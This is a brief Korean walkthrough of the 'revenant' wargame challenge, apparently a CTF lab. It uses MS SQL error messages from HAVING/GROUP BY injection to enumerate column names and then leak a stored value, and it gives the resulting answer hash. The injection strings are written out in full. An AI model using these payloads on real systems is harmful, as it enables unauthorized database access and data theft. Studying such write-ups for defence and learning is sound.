revenant

첫 화면이다.

having 절 사용 시 무조건 select가 지정한 컬럼들을 모두 group by에 넣고 구문이 실행되어야한다.

여기서 발생하는 MS SQL 에러 메시지를 사용해 컬럼의 이름을 하나씩 알 수 있다.

id에 admin' having 1=1-- 를 넣으면 결과가 아래와 같다.

id에 admin' group by id having 1=1-- 를 넣으면 결과가 아래와 같다.

id에 admin' group by id,pw having 1=1-- 를 넣으면 결과가 아래와 같다.

id에 admin' group by id,pw,[45a88487] having 1=1-- 를 넣으면 결과가 아래와 같다.

id에 admin' group by id,pw,[45a88487],[13477a35] having 1=1-- 를 넣으면 결과가 아래와 같다.

이제 5번째 컬럼의 이름을 알았으니 그 안의 값을 알아낸다.

id에 admin' and [9604b0c8]=1-- 를 넣으면 결과가 아래와 같다.

결론적으로, $result['4'] 의 값은 aa68a4b3fb327dee07f868450f7e1183 이다.

Last updated 4 years ago